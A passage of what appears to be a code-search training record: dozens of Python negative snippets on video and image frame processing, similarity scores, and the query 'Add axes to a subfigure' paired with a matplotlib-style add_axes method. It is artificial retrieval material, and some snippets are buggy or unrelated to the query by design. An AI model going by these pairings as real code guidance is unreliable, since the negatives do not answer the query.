imageio.imwrite(path_process + \"RetinaNet_Pauli/\" + str(k) + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0] + I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0] - I[2]\n if not os.path.exists(path_process + \"Pauli2/\"):\n os.mkdir(path_process + \"Pauli2/\")\n imageio.imwrite(path_process + \"Pauli2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0] + I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0] - I[2]\n if not os.path.exists(path_process + \"Pauli2_inv/\"):\n os.mkdir(path_process + \"Pauli2_inv/\")\n imageio.imwrite(path_process + \"Pauli2_inv/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = Stokes[0]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = Stokes[1]\n if not os.path.exists(path_process + \"Pauli2/\"):\n os.mkdir(path_process + \"Pauli2/\")\n imageio.imwrite(path_process + \"Pauli2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = (I[1]+I[3])/2\n Pauli[:, :, 2] = I[2]\n if not os.path.exists(path_process + \"Sinclair/\"):\n os.mkdir(path_process + \"Sinclair/\")\n imageio.imwrite(path_process + \"Sinclair/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = Stokes[0]\n Pauli[:, :, 1] = I[1] + I[3]\n Pauli[:, :, 2] = Stokes[1]\n if not os.path.exists(path_process + \"Pauli/\"):\n os.mkdir(path_process + \"Pauli/\")\n imageio.imwrite(path_process + \"Pauli/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[2]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test/\"):\n os.mkdir(path_process + \"Test/\")\n imageio.imwrite(path_process + \"Test/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[1]\n Pauli[:, :, 1] = I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test1/\"):\n os.mkdir(path_process + \"Test1/\")\n imageio.imwrite(path_process + \"Test1/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test2/\"):\n os.mkdir(path_process + \"Test2/\")\n imageio.imwrite(path_process + \"Test2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[1] + I[2] - I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test3/\"):\n os.mkdir(path_process + \"Test3/\")\n imageio.imwrite(path_process + \"Test3/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = (I[0]/I[1]) #/ np.amax(I[0] / I[1]) * 255\n if not os.path.exists(path_process + \"Pauli3/\"):\n os.mkdir(path_process + \"Pauli3/\")\n imageio.imwrite(path_process + \"Pauli3/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Rachel = np.zeros((500, 500, 3))\n Rachel[:, :, 0] = Stokes[0]\n Rachel[:, :, 1] = Stokes[1]\n Rachel[:, :, 2] = DOP\n if not os.path.exists(path_process + \"RetinaNet_Rachel/\"):\n os.mkdir(path_process + \"RetinaNet_Rachel/\")\n imageio.imwrite(path_process + \"RetinaNet_Rachel/\" + str(k) + \".png\", Rachel)\n\n Rachel = np.zeros((500, 500, 3))\n 
Rachel[:, :, 0] = I[1]\n Rachel[:, :, 1] = I[0]\n Rachel[:, :, 2] = DOP\n if not os.path.exists(path_process + \"RetinaNet_Rachel2/\"):\n os.mkdir(path_process + \"RetinaNet_Rachel2/\")\n imageio.imwrite(path_process + \"RetinaNet_Rachel2/\" + str(k) + \".png\", Rachel)\"\"\"", "def observation(self, frame):\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n return frame", "def execute_pipeline(userId, srcDir, srcName, isShinobi):\n # print(f'{userId} - {srcDir} - {srcName}')\n videoSrc = srcDir + '/' + srcName \n metaDataDict = extract_metadata(videoSrc)\n\n video_id = write_metadata(\n userId, \n srcName,\n metaDataDict[\"width\"], \n metaDataDict[\"height\"], \n metaDataDict[\"fps\"], \n metaDataDict[\"numframes\"]\n )\n \n # Splitting up \n print(\"***************** Splitting up... *****************\")\n call([\n movieToFrames, \n videoSrc, \n str(metaDataDict[\"fps\"]), \n srcDir + \"\"\"/frames%d.png\"\"\"\n ])\n \n # Processing\n shapePoints = []\n pupilPoints = []\n skullPoints = []\n print(\"Starting landmark detection...\")\n print(\"***************** Starting landmark detection... *****************\")\n for i in range(1, metaDataDict[\"numframes\"] + 1):\n imgPath = srcDir + \"/frames\" + str(i) + \".png\"\n imgDest = srcDir + \"/landmark\" + str(i) + \".png\"\n tempDict = detectLandmarks(imgPath, imgDest, isShinobi)\n shapePoints.append(tempDict[\"shape\"])\n pupilPoints.append(tempDict[\"pupils\"])\n skullPoints.append(tempDict[\"rotation\"])\n \n # Merging\n print(\"***************** Starting stiching up... *****************\")\n call([\n framesToMovie, \n str(metaDataDict[\"fps\"]), \n str(metaDataDict[\"width\"]) + \"x\" + str(metaDataDict[\"height\"]), \n str(metaDataDict[\"numframes\"]),\n srcDir + \"\"\"/landmark%d.png\"\"\", \n srcDir + \"/\" + str(userId) + '_' + srcName\n ])\n \n write_pupils(video_id, pupilPoints)\n write_landmarks(video_id, shapePoints)\n write_skull(video_id, skullPoints)\n\n with open(srcDir + \"/\" + str(userId) + '_' + srcName + '.json', 'w') as cache: \n metaDataDict[\"video_id\"] = video_id\n json.dump(metaDataDict, cache)", "def preprocess(self, frame: np.ndarray) -> torch.TensorType:\n tensor = cv.resize(frame, (self.IMGSZ, self.IMGSZ)) \n tensor = tensor.transpose(2, 0, 1)\n tensor = torch.from_numpy(tensor)\n tensor = torch.unsqueeze(tensor, 0)\n tensor = tensor.half() if self.half else tensor.float()\n tensor = tensor / 255.0\n tensor = tensor.to(self.device)\n\n return tensor", "def process(self):\n frame_count = 0\n size = self.frame.size\n while True:\n try:\n for i in range(parallel.BUFFER_LENGTH):\n offset = i * size;\n self.manager.image[offset : offset + size] = self.frame.ravel()\n self.ret, self.frame = self.capture.read()\n if not self.ret:\n self.clear_buffer(offset=offset + size + 1)\n raise StopIteration\n if DEBUG_LEVEL > 2:\n cv.imshow(self.name, self.frame)\n frame_count += 1\n key = cv.waitKey(self.toggle)\n if key is 27:\n raise StopIteration\n return\n elif key is 32:\n self.toggle ^= 1\n self.manager.detect()\n self.barrier.wait()\n except StopIteration:\n # Handle dangling frames in buffer and return gracefully\n self.manager.detect()\n self.barrier.wait()\n self.cleanup()\n try:\n # Handle rangequits in Phase 1\n for rv in self.variables:\n for event in rv['events']:\n if event['event_subtype'] == \"Finish\":\n return self.variables\n return None\n except:\n # Phase 0 -- no handling\n return self.variables\n except:\n # Any other exception is bad!\n return None", "def 
createPipeline(self, w):\n\n # code will make the ximagesink output in the specified window\n def set_xid(window):\n gtk.gdk.threads_enter()\n sink.set_xwindow_id(window.window.xid)\n sink.expose()\n gtk.gdk.threads_leave()\n\n # this code receives the messages from the pipeline. if we\n # need to set X11 id, then we call set_xid\n def bus_handler(unused_bus, message):\n if message.type == gst.MESSAGE_ELEMENT:\n if message.structure.get_name() == 'prepare-xwindow-id':\n set_xid(w)\n return gst.BUS_PASS\n\n # create our pipeline, and connect our bus_handler\n self.pipeline = gst.Pipeline()\n bus = self.pipeline.get_bus()\n bus.set_sync_handler(bus_handler)\n\n sink = gst.element_factory_make(\"ximagesink\", \"sink\")\n sink.set_property(\"force-aspect-ratio\", True)\n sink.set_property(\"handle-expose\", True)\n scale = gst.element_factory_make(\"videoscale\", \"scale\")\n cspace = gst.element_factory_make(\"ffmpegcolorspace\", \"cspace\")\n\n # our pipeline looks like this: ... ! cspace ! scale ! sink\n self.pipeline.add(cspace, scale, sink)\n scale.link(sink)\n cspace.link(scale)\n return (self.pipeline, cspace)", "def convertFrame(self):\n try:\n height,width=self.currentFrame.shape[:2]\n img=QtGui.QImage(self.currentFrame,\n width,\n height,\n QtGui.QImage.Format_RGB888)\n img=QtGui.QPixmap.fromImage(img)\n self.previousFrame = self.currentFrame\n return img\n except:\n return None", "def new_image_callback(self, new_image_msg):\n self.process_new_frame(\n self.cv_bridge.imgmsg_to_cv2(\n new_image_msg,\n desired_encoding=\"bgr8\"\n )\n )", "def create_final_image(full_frame):\n quad_a = full_frame[0, :, :]\n quad_b = full_frame[1, :, :]\n quad_c = full_frame[2, :, :]\n quad_d = full_frame[3, :, :]\n uv_ccd = np.concatenate((quad_d, np.fliplr(quad_c)),\n axis=1)\n visible_ccd = np.concatenate((np.flipud(quad_a), np.rot90(quad_b, 2)),\n axis=1)\n processed_image = np.concatenate((uv_ccd, visible_ccd), axis=0)\n return processed_image", "def add_image_to_frame_list(self,startFrame, endFrame, imageName): \n for i in range(startFrame-1, endFrame-1):\n try:\n # image = imageio.imread(imageName)\n im = Image.open(imageName)\n im = im.resize((720, 720))\n self.frame_list.append(im)\n # self.frame_list.append(im)\n\n except:\n print (imageName, \" not found.\")\n # BufferedImage bi= new BufferedImage(320,240,BufferedImage.TYPE_BYTE_GRAY);\n im=self.blank\n self.frame_list.append(im)", "def process(\n self,\n image: np.array\n ) -> np.array:\n pass", "def annotated_frame(self, original_frame):\n frame = original_frame.copy()\n\n if self.pupils_located:\n color = (0, 255, 0)\n x_left, y_left = self.pupil_left_coords()\n x_right, y_right = self.pupil_right_coords()\n cv2.line(frame, (x_left - 5, y_left), (x_left + 5, y_left), color)\n cv2.line(frame, (x_left, y_left - 5), (x_left, y_left + 5), color)\n cv2.line(frame, (x_right - 5, y_right), (x_right + 5, y_right), color)\n cv2.line(frame, (x_right, y_right - 5), (x_right, y_right + 5), color)\n\n return frame", "def NextFrame(self, event):\n buffer = self.GetDataBuffer()\n if buffer is not None:\n # Update bitmap widget with new image frame:\n self.bitmap.CopyFromBuffer(buffer)\n # Refresh panel to draw image into bitmap:\n self.Refresh()\n pass", "def run(input_video_file, output_video_file):\n print(\"Debut de la transformation du format de la video\")\n #récupération de la vidéo\n video = cv2.VideoCapture(input_video_file)\n #fps de la vidéo\n fps = video.get(cv2.CAP_PROP_FPS)\n #largeur des images de la vidéo\n width_video = 
int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n #hauteur des images de la vidéo\n height_video = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n #nombre d'images dans la vidéo\n frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n #durée de la vidéo\n duration = frame_count/fps\n #nouvelle durée de la vidéo (on arrondi)\n new_duration = math.floor(duration)\n #nouveau fps de la vidéo\n new_fps = float(round(fps))\n #appliquer le nouveau fps\n video.set(cv2.CAP_PROP_FPS,new_fps)\n #appliquer la nouvelle durée\n print(new_duration)\n print(new_fps)\n print(new_duration*new_fps)\n new_frame_count = new_duration*new_fps\n video.set(cv2.CAP_PROP_FRAME_COUNT,new_duration*new_fps)\n #déffinition du format de la vidéo en sortie\n video_out = cv2.VideoWriter(output_video_file,0x7634706d,new_fps,(width_video,height_video),True)\n \n count = 0\n #ouverture de la vidéo\n while(video.isOpened()):\n #lecture image par image\n ret, frame = video.read()\n if ret==True:\n\n #ecriture de l'image dans la vidéo en sortie\n video_out.write(frame)\n count = count + 1\n \n if (count > (new_frame_count-1)):\n # Libérer la vidéo\n video.release()\n break\n else:\n break\n\n print(\"fin de la transformation\")\n #fermer les vidéos\n video.release()\n video_out.release()", "def player_processframe_event(self, frame):\n\t\tpaths = self._panel_path.value.datasets\n\t\tareas = self._panel_area.value.datasets\n\t\tcolors = self._panel_colors.value.datasets\n\t\timages = self._panel_imgs.value.images\n\n\t\t# check if should use the current frame or an image selected to background\n\t\tframe = frame if len(images)!=1 else images[0].image.copy()\n\t\tindex = self._player.video_index-1\n\t\n\t\tfor path in paths:\n\t\t\t# draw the path if the option is selected\n\t\t\tif self._drawpath.value: path.draw_path(frame, None, index)\n\n\t\t\tarea = self.get_object_area(path, areas, index)\n\t\t\tif area is not None:\n\t\t\t\tcolor \t = self.get_object_color(path, colors, index)\n\t\t\t\tposition = path.get_position(index)\n\t\t\t\t\n\t\t\t\tif position is not None and area is not None and color is not None:\n\t\t\t\t\tradius = int(round(math.sqrt(area/math.pi)))\t\t\t\t\n\t\t\t\t\tcv2.circle(frame, position, radius, color, -1)\n\n\t\tself.draw_events(index, frame)\n\n\t\treturn frame", "def annotated_frame(self):\n frame = self.frame.copy()\n if self.pupils_located:\n color = (0, 255, 0)\n x_left, y_left = self.pupil_left_coords()\n x_right, y_right = self.pupil_right_coords()\n # cv2.line(frame, (x_left - 5, y_left), (x_left + 5, y_left), color)\n # cv2.line(frame, (x_left, y_left - 5), (x_left, y_left + 5), color)\n # cv2.line(frame, (x_right - 5, y_right), (x_right + 5, y_right), color)\n # cv2.line(frame, (x_right, y_right - 5), (x_right, y_right + 5), color)\n return frame", "def registerDepthFrame(self, frame):\n frame = cv2.warpAffine(frame, self.depth2rgb_affine,\n (frame.shape[1], frame.shape[0]))\n return frame", "def visualize_flow(src, flow_comp_func):\n\n # Flag specifying whether this is the first frame or not.\n first_frame = True\n \n # Initialize video stream.\n video_capture = cv2.VideoCapture(src)\n if not video_capture.isOpened():\n raise RuntimeError(\"Error opening video stream.\")\n \n # Previous frame buffer and results array.\n prev = None\n res = []\n \n # Set frame counter.\n count = 0\n FRAME_LIM = 200\n \n # While there is video and while below frame index limit.\n while video_capture.isOpened() and count < FRAME_LIM:\n\n # Increment frame count.\n count += 1\n print(\"Processing frame 
{0}/{1}\".format(count, FRAME_LIM))\n\n # Get next frame.\n ret, frame = video_capture.read()\n if ret:\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n # If first frame ...\n if first_frame:\n \n # Set frame as previous frame.\n prev = frame_gray\n prev_original = frame\n \n # Set first frame flag to false.\n first_frame = False\n\n else:\n\n # Compute flow using current frame and frame\n # in previous buffer.\n u, v = flow_comp_func(prev.astype(float)/255.0, frame_gray.astype(float)/255.0)\n \n\n ### TODO - remove ###\n # import pdb\n # pdb.set_trace()\n # fig2, ((ax2_11, ax2_12), (ax2_21, ax2_22)) = plt.subplots(2, 2)\n # ax2_11.imshow(prev)\n # ax2_12.imshow(frame_gray)\n # show_flow(u, v, ax2_21, type='angle')\n # show_flow(u, v, ax2_22, type='field', set_aspect=True)\n # fig2.suptitle('Horn−Schunck Optical Flow')\n ######\n\n # Add optical flow visualization to image in prev buffer.\n vis_nxt = superimpose_field(u, v, prev_original)\n\n prev = frame_gray\n prev_original = frame\n\n # Store visualization in results buffer\n res.append(vis_nxt)\n\n else:\n break\n \n # Release stream.\n video_capture.release()\n\n # Create gif file from images.\n imageio.mimsave('roundabout_hs.gif', res)", "def motion_extraction():\n # iterate through frames\n global frame_height, frame_width\n global limb_coords, init_coords\n frame_count = 0\n has_frames, frame = capture.read()\n\n while has_frames:\n img_out = frame.copy()\n img_out = insert_padding(img_out, 14*14, 12*14)\n\n if frame_count == 0:\n # change global values of height and width\n frame_height = frame_height + 14*14*2\n frame_width = frame_width + 12*14*2\n get_start_positions(img_out)\n img_out2 = segment_red(img_out, 200, 130)\n #erode(img_out2, 4, 6)\n remove_artifacts(img_out2)\n #enhance_contrast(img_out2)\n\n if frame_count > 0:\n get_motion(prev_frame, img_out2, frame_count)\n\n prev_frame = img_out2.copy()\n frame_count += 1\n has_frames, frame = capture.read()", "def gen(camera):\n #time.sleep(3)\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def augment(self, image):\n pass", "def splitTransform(self):\n\t\t#path_merge = \"transform\"\n\t\t#path_train = \"transform/data/\"\n\t\t#path_label = \"transform/label/\"\n\t\tpath_merge = \"train/merge\"\n\t\tpath_train = \"train/image\"\n\t\tpath_label = \"train/label\"\n\t\ttrain_imgs = glob.glob(path_merge+\"/*.\"+self.img_type)\n\t\tfor imgname in train_imgs:\n\t\t\tmidname = imgname[imgname.rindex(\"/\")+1:imgname.rindex(\".\"+self.img_type)]\n\t\t\timg = cv2.imread(imgname)\n\t\t\timg_train = img[:,:,2]#cv2 read image rgb->bgr\n\t\t\timg_label = img[:,:,0]\n\t\t\tcv2.imwrite(path_train+midname+\".\"+self.img_type,img_train)\n\t\t\tcv2.imwrite(path_label+midname+\".\"+self.img_type,img_label)", "def preprocess_output(self, face_box, frame):\n if face_box is None or frame is None or frame.size < 1:\n return None, None\n else:\n face_box = helpers.fit(face_box, frame)\n face_img = helpers.crop(frame, face_box)\n return face_img, face_box", "def tagVideo(modelpath, videopath, outputPath=None): \n model = get_model_instance_segmentation(3)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # model.load_state_dict(torch.load(modelpath, map_location=device), strict=False)\n model.load_state_dict(torch.load(modelpath, map_location=device))\n model = model.to(device)\n model.eval()\n\n \n data_transform = transforms.Compose([\n ToPILImage(),\n 
transforms.ToTensor(), \n ])\n\n\n if outputPath:\n writer = FFmpegWriter(str(outputPath))\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.namedWindow('main', cv2.WINDOW_NORMAL)\n labels = ['No mask', 'Mask']\n labelColor = [(10, 0, 255), (10, 255, 0)]\n img_count = 0\n outputDir = os.path.dirname(os.path.realpath(outputPath))\n frame_count = 0\n boundingBoxes = []\n for frame in vreader(str(videopath)):\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n print('Frame:', frame_count)\n\n if frame_count%30==0:\n frameTensor = data_transform(frame)\n frameTensor = torch.unsqueeze(frameTensor, 0).to(device)\n output = model(frameTensor)\n boundingBoxes = plot_image_new(frame, frameTensor[0], output[0]) \n \n if len(boundingBoxes)>0:\n for bb in boundingBoxes:\n cv2.rectangle(frame,\n (bb[0], bb[1]),\n (bb[2], bb[3]),\n (54, 66, 227),\n thickness=2)\n\n cv2.imshow('main', frame)\n if outputPath:\n writer.writeFrame(cv2.cvtColor(frame, cv2.COLOR_RGB2BGR))\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n frame_count += 1\n if outputPath:\n writer.close()\n cv2.destroyAllWindows()", "def convertFrame(self):\r\n try:\r\n height, width = self.currentFrame.shape[:2]\r\n img = QtGui.QImage(self.currentFrame,\r\n width,\r\n height,\r\n QtGui.QImage.Format_RGB888)\r\n img = QtGui.QPixmap.fromImage(img)\r\n self.previousFrame = self.currentFrame\r\n return img\r\n except:\r\n return None", "def frames(self):\n while True:\n ret, frame = self.classification()\n if ret == True:\n yield cv2.imencode('.jpg', frame)[1].tobytes()\n else:\n break", "def step(self, frame):\n if not self._stack:\n # Fill stack with copies of first frame if empty.\n self._stack.extend([frame] * (self._num_frames - 1))\n self._stack.append(frame)\n # Match BCAgent's stacking along axis 2.\n stacked_frames = np.stack(self._stack, axis=2)\n\n if not self._flatten:\n return stacked_frames\n else:\n new_shape = stacked_frames.shape[:-2] + (-1,)\n return stacked_frames.reshape(*new_shape)", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: {:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n 
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def post_processing(frame,\r\n enable_spatial=True,\r\n enable_temporal=True,\r\n enable_hole=True,\r\n spatial_params=[(rs.option.filter_magnitude, 5), \r\n (rs.option.filter_smooth_alpha, 1),\r\n (rs.option.filter_smooth_delta, 50),\r\n (rs.option.holes_fill, 3)],\r\n temporal_params=[],\r\n hole_params=[]):\r\n # Filters and settings\r\n depth_to_disparity = rs.disparity_transform(True)\r\n disparity_to_depth = rs.disparity_transform(False)\r\n\r\n # Depth to disparity before spatial and temporal filters\r\n frame = depth_to_disparity.process(frame)\r\n\r\n # Spatial filter\r\n if enable_spatial:\r\n # Settings\r\n spatial = rs.spatial_filter()\r\n for spatial_param in spatial_params:\r\n spatial.set_option(spatial_param[0], spatial_param[1])\r\n\r\n # Apply on frame\r\n frame = spatial.process(frame)\r\n\r\n # Temporal filter\r\n if enable_temporal:\r\n temporal = rs.temporal_filter()\r\n for temporal_param in temporal_params:\r\n temporal.set_option(temporal_param[0], temporal_param[1])\r\n frame = temporal.process(frame)\r\n\r\n # Back to depth\r\n frame = disparity_to_depth.process(frame)\r\n\r\n # Hole filling\r\n if enable_hole:\r\n hole_filling = rs.hole_filling_filter()\r\n for hole_param in hole_params:\r\n hole_filling.set_option(hole_param[0], hole_param[1])\r\n frame = hole_filling.process(frame)\r\n\r\n return frame", "def camframes(tree, cam_frame):\n campath = '.PIMAX3'\n cam_frame = cam_frame + 1\n AddNodeWithTag(tree, campath + ':FRAME_' + str(cam_frame), 'NUMERIC',\n 'PIMAX_FRAME' + str(cam_frame))\n AddNumericWithUnit(tree, campath + '.FRAME_' + str(cam_frame) +\n ':EXPOSURE', 'EXPOSURE_PFRAME' + str(cam_frame), 's')\n AddNumericWithUnit(tree, campath + '.FRAME_' + str(cam_frame) + ':DELAY', \n 'GATEDELAY_PFRAME' + str(cam_frame), 's')", "def prepare_test_frames(self, idx):\n results = copy.deepcopy(self.video_infos[idx])\n results['filename_tmpl'] = self.filename_tmpl\n results['modality'] = self.modality\n results['start_index'] = self.start_index\n ann_frame_dir = results['frame_dir'].replace(self.data_prefix,\n self.anno_prefix)\n results['seg_map'] = osp.join(\n ann_frame_dir,\n self.filename_tmpl.format(0).replace('jpg', 'png'))\n return self.pipeline(results)", "def __init__(self, frames=[]):\n # All the frames are converted to TextImage objects.\n self.frames = list(map(TextImage, frames))", "def create_image_pyramids(self):\r\n curr_cam0_img = self.cam0_curr_img_msg.image\r\n # self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam0_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam0_pyramid = curr_cam0_img\r\n\r\n curr_cam1_img = self.cam1_curr_img_msg.image\r\n # self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam1_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam1_pyramid = curr_cam1_img", "def generate():\n global output_frame, lock\n while True:\n with lock:\n if output_frame is None:\n continue\n (flag, encoded_image) = cv2.imencode(\".jpg\", output_frame)\n if not flag:\n continue\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encoded_image) + b'\\r\\n')", "def __init__(self, batch_env):\n\n dims = [84, 84]\n nature_transform = lambda o: tf.image.rgb_to_grayscale( # pylint: disable=g-long-lambda\n tf.image.resize_images(o, dims))\n\n 
super(WarpFrameWrapper, self).__init__(batch_env, transform_observation=(\n nature_transform, dims, tf.float32))", "def make_video(data,\n xdim, ydim, sample_read_rows, sample_read_cols, image_write_rows, image_write_cols,\n directory, filename, fps = 24.0, start_frame = 1, end_frame = None, timestamp = False, fontsize = 30, ts_pos = (0,0), save_raw = False):\n\n #Command to send via the command prompt which specifies the pipe parameters\n # command = ['ffmpeg',\n # '-y', # (optional) overwrite output file if it exists\n # '-f', 'image2pipe',\n # '-vcodec', 'mjpeg', #'mjpeg',\n # '-r', '1',\n # '-r', str(fps), # frames per second\n # '-i', '-', # The input comes from a pipe\n # '-an', # Tells FFMPEG not to expect any audio\n # '-vcodec', 'mpeg4',\n # '-b:v', '5000k',\n # directory + filename + \"/\"+filename+\".mp4\",\n # '-hide_banner',\n # '-loglevel', 'panic']\n\n # Create directories if they don't exist\n if not os.path.exists(os.path.join(directory, filename, 'frames/')):\n os.makedirs(os.path.join(directory, filename, 'frames/'))\n if save_raw and not os.path.exists(os.path.join(directory, filename, 'frames-raw/')):\n os.makedirs(os.path.join(directory, filename, 'frames-raw/'))\n\n if end_frame == None:\n end_frame = data.FrameCount\n\n cm = colormap.get_cmap('viridis')\n\n for i, frame_offset in enumerate(tqdm.tqdm(range(start_frame, end_frame))):\n frame = FrameRead(data, frame_offset)\n frame_image = np.zeros([ydim, xdim], dtype=np.uint8)\n frame_image[image_write_rows, image_write_cols] = frame.frame_data[sample_read_rows, sample_read_cols]\n\n rgb_im = Image.fromarray(cm(frame_image, bytes=True)).convert('RGB')\n rgb_im.save(os.path.join(directory, filename, 'frames/', f'{i}.jpg'), 'JPEG')\n\n if save_raw:\n Image.fromarray(np.uint8(frame.frame_data), mode='L').save(os.path.join(directory, filename, 'frames-raw/', f'{i}.jpg'), 'JPEG')", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None" ]
[ "0.70714897", "0.68649685", "0.67296463", "0.6588955", "0.65738624", "0.65543723", "0.65153533", "0.6485808", "0.6470367", "0.6332151", "0.62973356", "0.6296194", "0.62521416", "0.62226206", "0.62107146", "0.62040466", "0.6200719", "0.61632663", "0.6150653", "0.6135857", "0.6127615", "0.60991275", "0.60951287", "0.6071355", "0.6058942", "0.6038246", "0.60366976", "0.6033891", "0.6032678", "0.60286", "0.60121095", "0.60083866", "0.60040784", "0.5997873", "0.59942776", "0.5980825", "0.5979414", "0.59780884", "0.5971989", "0.5948592", "0.5947269", "0.5940676", "0.5935967", "0.5925732", "0.5924167", "0.58969826", "0.5879622", "0.586481", "0.58647317", "0.5862134", "0.5857012", "0.5853598", "0.58465886", "0.58115923", "0.5801189", "0.57942224", "0.5794216", "0.5793752", "0.5781946", "0.57803494", "0.5767385", "0.57658327", "0.5762573", "0.57380205", "0.5737169", "0.5726572", "0.572567", "0.5702164", "0.5696915", "0.5684015", "0.5677774", "0.56771034", "0.5676851", "0.5676589", "0.56743956", "0.5666674", "0.5665952", "0.5661595", "0.56594694", "0.5659262", "0.56427985", "0.56411403", "0.56406814", "0.56404936", "0.5637331", "0.56363165", "0.56356007", "0.56328267", "0.5631252", "0.5628585", "0.56212837", "0.56191725", "0.561051", "0.56098974", "0.5605515", "0.560327", "0.560327", "0.560327", "0.560327", "0.560327", "0.560327" ]
0.0
-1
Add axes to a subfigure.
def add_axes(self, i, j, rect, **kw):
    # Get image offset in figure coordinates
    irev = self.nrows - 1 - i
    subfig = self.pad + self.image
    offset = self.margin.bottom_left + irev*subfig.ybox + j*subfig.xbox + self.pad.bottom_left
    # Convert image rect to figure rect
    imstart = Box(rect[0], rect[1])
    imshape = Box(rect[2], rect[3])
    figstart = (offset + imstart * self.image) / self.fig
    figshape = imshape * self.image / self.fig
    figrect = [figstart.x, figstart.y, figshape.x, figshape.y]
    return self.figure.add_axes(figrect, **kw)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
